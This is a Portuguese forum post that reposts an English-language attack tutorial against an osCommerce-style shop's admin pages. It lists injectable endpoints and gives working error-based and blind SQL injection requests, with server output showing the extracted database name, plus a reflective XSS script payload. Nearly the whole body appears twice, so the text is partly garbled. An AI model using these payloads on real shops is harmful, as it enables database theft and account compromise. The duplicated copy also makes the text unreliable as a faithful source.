[Tutorial] Multiplas XSS/SQLi
Página 1 de 1
[Tutorial] Multiplas XSS/SQLi
Olha primeiro de tudo quero deixar claro que eu peguei da deepweb esse tutorial, portanto não é meu!
Segundo foi testado em windows xp usando o xampp!
Isso é mto usado pra joguinhos u.u
Bom ta ai , leiam (está em ingles isso msm) eu consegui fazer, ler e tudo então se virem hehe
SQL Injection
######################
SQL Injection 1
/catalog/admin/index.php - [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SQL Injection 2
/catalog/admin/newsletters.php
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SQL Injection 3
/catalog/admin/orders.php
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SQL Injection 4
/catalog/admin/xsell.php
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SQL Injection 5
/catalog/admin/create_account_process.php - Create Account (country, zone_id parameters)
Additional
/catalog/admin/categories.php
/catalog/admin/articles.php
/catalog/admin/create_account.php
XSS
#######################
Persistent
/catalog/admin/newsletters.php - Create newsletter (module parameter)
/catalog/admin/categories.php - Create category (multiple parameters)
/catalog/admin/xsell.php - Create cross sell (products_model parameter)
<snip>
Reflective
/catalog/admin/xsell.php?add_related_product_ID=1&action=update_c
ross&x=24&y=10&product[]=1&cross[]=1&product[]=1&reciprocal_link_cross[]=1
/catalog/admin/xsell.php?add_related_product_ID=><script>alert(1) </script>
/catalog/admin/create_account_process.php - Create account (firstname,lastname,postcode, street_address, city parameter)
/catalog/admin/articles.php - Create articles - (all parameters)
<snip>
Code Examples :
#######################
SQL Injection Example 1 - Error Based
Request - Extracting current_db()
action=process&firstname=cust&lastname=cust&email_
address=cust@cust.com&street_address=cust&postcode
=cust&city=cust&zone_id=&country=1' AND (SELECT 5273
FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,113,58),(MID((IFNU
LL(CAST(DATABASE() AS CHAR),CHAR(32))),1,50)),CHAR(58,102,109,102,58),FL
OOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND
'eVyL'='eVyL&telephone=12345678&fax=&newsletter=1&
customers_group_id=0&x=19&y=5
Response - Current DB = sectestosc
<font
color="#000000"><b>1062 - Duplicate entry
':srq:sectestosc:fmf:1' for key 'group_key'<br><br>select
zone_name from zones where zone_country_id = '1' AND (SELECT 5273
FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,113,58),(MID((IFNU
LL(CAST(DATABASE() AS CHAR),CHAR(32))),1,50)),CHAR(58,102,109,102,58),FL
OOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND
'eVyL'='eVyL' and zone_id = ''<br><br><small><font
color="#ff0000">[TEP
STOP]</font></small><br><br></b></font>
SQL Injection Example 2 - Blind
POC 1
(TRUE):
GET /catalog/admin/newsletters.php/1' OR substr((select user()),1,4)='root HTTP/1.1
Valid Newsletter Page - 200
(FALSE):
GET /catalog/admin/newsletters.php/1' OR substr((select user()),1,4)='test
Invalid Redirect Page - 302
Segundo foi testado em windows xp usando o xampp!
Isso é mto usado pra joguinhos u.u
Bom ta ai , leiam (está em ingles isso msm) eu consegui fazer, ler e tudo então se virem hehe
SQL Injection
######################
SQL Injection 1
/catalog/admin/index.php - [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SQL Injection 2
/catalog/admin/newsletters.php
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SQL Injection 3
/catalog/admin/orders.php
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SQL Injection 4
/catalog/admin/xsell.php
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
SQL Injection 5
/catalog/admin/create_account_process.php - Create Account (country, zone_id parameters)
Additional
/catalog/admin/categories.php
/catalog/admin/articles.php
/catalog/admin/create_account.php
XSS
#######################
Persistent
/catalog/admin/newsletters.php - Create newsletter (module parameter)
/catalog/admin/categories.php - Create category (multiple parameters)
/catalog/admin/xsell.php - Create cross sell (products_model parameter)
<snip>
Reflective
/catalog/admin/xsell.php?add_related_product_ID=1&action=update_c
ross&x=24&y=10&product[]=1&cross[]=1&product[]=1&reciprocal_link_cross[]=1
/catalog/admin/xsell.php?add_related_product_ID=><script>alert(1) </script>
/catalog/admin/create_account_process.php - Create account (firstname,lastname,postcode, street_address, city parameter)
/catalog/admin/articles.php - Create articles - (all parameters)
<snip>
Code Examples :
#######################
SQL Injection Example 1 - Error Based
Request - Extracting current_db()
action=process&firstname=cust&lastname=cust&email_
address=cust@cust.com&street_address=cust&postcode
=cust&city=cust&zone_id=&country=1' AND (SELECT 5273
FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,113,58),(MID((IFNU
LL(CAST(DATABASE() AS CHAR),CHAR(32))),1,50)),CHAR(58,102,109,102,58),FL
OOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND
'eVyL'='eVyL&telephone=12345678&fax=&newsletter=1&
customers_group_id=0&x=19&y=5
Response - Current DB = sectestosc
<font
color="#000000"><b>1062 - Duplicate entry
':srq:sectestosc:fmf:1' for key 'group_key'<br><br>select
zone_name from zones where zone_country_id = '1' AND (SELECT 5273
FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,113,58),(MID((IFNU
LL(CAST(DATABASE() AS CHAR),CHAR(32))),1,50)),CHAR(58,102,109,102,58),FL
OOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND
'eVyL'='eVyL' and zone_id = ''<br><br><small><font
color="#ff0000">[TEP
STOP]</font></small><br><br></b></font>
SQL Injection Example 2 - Blind
POC 1
(TRUE):
GET /catalog/admin/newsletters.php/1' OR substr((select user()),1,4)='root HTTP/1.1
Valid Newsletter Page - 200
(FALSE):
GET /catalog/admin/newsletters.php/1' OR substr((select user()),1,4)='test
Invalid Redirect Page - 302
Tópicos semelhantes
» [tutorial] cookie em php
» [tutorial] basico em xml
» [tutorial] basico em css
» [tutorial] namespace
» [tutorial] printf no php?
» [tutorial] basico em xml
» [tutorial] basico em css
» [tutorial] namespace
» [tutorial] printf no php?
Página 1 de 1
Permissões neste sub-fórum
Não podes responder a tópicos